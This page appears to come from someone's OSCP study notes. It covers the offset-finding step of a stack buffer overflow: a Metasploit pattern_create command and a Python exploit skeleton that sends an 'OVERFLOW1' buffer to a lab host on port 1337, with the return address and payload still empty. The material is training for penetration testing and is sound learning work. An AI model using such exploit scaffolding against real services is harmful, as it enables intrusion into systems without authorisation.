✏️
OSCP
  • $WhoAmI?
  • Manual
  • NMAP
    • NSE Scripts
  • Steganography
  • Services Enumeration
    • Postgres Psql
    • SNMTP - 199
    • SSH - 22
    • TELNET - 23
    • RDP - 3389
    • DISTCCD - 3632
    • IMAP - 143
    • TFTP - UDP69
    • FTP - 21
    • HTTP 80/443
      • LFI to RCE
      • ShellShock
      • GIT
      • XXE, SQLI, CRLF, CSV,
      • CMS
      • Locations
        • Interested Linux Files
        • Logs
      • Command Injection
      • Remote File Inclusion (RFI)
      • File Upload Vulnerabilities
      • Remote Code Execution (RCE)
      • SQL Injection
      • Local File Inclusion (LFI)
        • LFI TO RCE
      • Web Enumeration
        • Patator BruteForce
        • ShellShock
        • Nikto
        • Anonymous Scanning
        • Fuzzers
        • DNS
    • SMB 139/445
      • SMB Exploit
      • SMB Enumerate
      • Send and Execute
      • Samba 2.2.x
    • RPC - 111
    • NFS
    • SNMP 161
    • SMTP 25
    • VNC - 5800
    • MYSQL - 3306
    • POP3 - 110
    • LDAP - 389
    • IRC 667
    • Java-RMI 1098/1099/1050
    • 1433 - MSSQL
  • Linux
    • Shells Linux
    • File Transfer
    • Linux Priv Esc
    • Fix Shell
    • Upload
    • Restricted Shell
  • Windows
    • File Transfer
    • Reverse Shell Cheatsheet
      • Full TTYs
      • Shells - Windows
      • MSFVENOM
    • Post Explotation
      • Nishang
      • Kernel Exploits
      • Service Exploits
      • Unquoted service paths
      • Mimikatz
    • BackDoors
    • EternalBlue MS17-010
    • Windows - Download and execute methods
    • Windows Priv Exc
    • Priv Esc Tools
    • ByPass UAC
      • Bypassing default UAC settings manually c++
      • EventVwr Bypass UAC Powershell
      • ByPass UAC Metasploit
      • Bypassing UAC with Kali’s bypassuac
      • Bypass UAC on Windows Vista
  • Password Attack
    • Intercepting Login Request
    • Windows Hashes
    • Linux Hashes
    • Wordlists
    • Brute Force Password Attacks & Cracking
    • Hashes
  • Network Pivoting Techniques
  • Buffer OverFlow
    • 6. Getting Shell
    • 5. Finding Bad Characters
    • 4. Overwrite EIP
    • 3. Finding The Offset
    • 2. Fuzzing
    • 1. Spiking
  • Downloads
  • Online Websites
  • Privilege Escalation History
  • Exploit
    • Unreal IRC
    • Sambacry
    • Shellshock
    • Padding Oracle Attack
Powered by GitBook
On this page

Was this helpful?

  1. Buffer OverFlow

3. Finding The Offset

Previous4. Overwrite EIPNext2. Fuzzing

Last updated 4 years ago

Was this helpful?

Offset

Offset is the specific point that we break the program with Fuzzing.

Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server (change the -l value to this):

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

Copy the output and place it into the payload variable of the script.

import socket

ip = "10.10.213.94"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")
exploit.py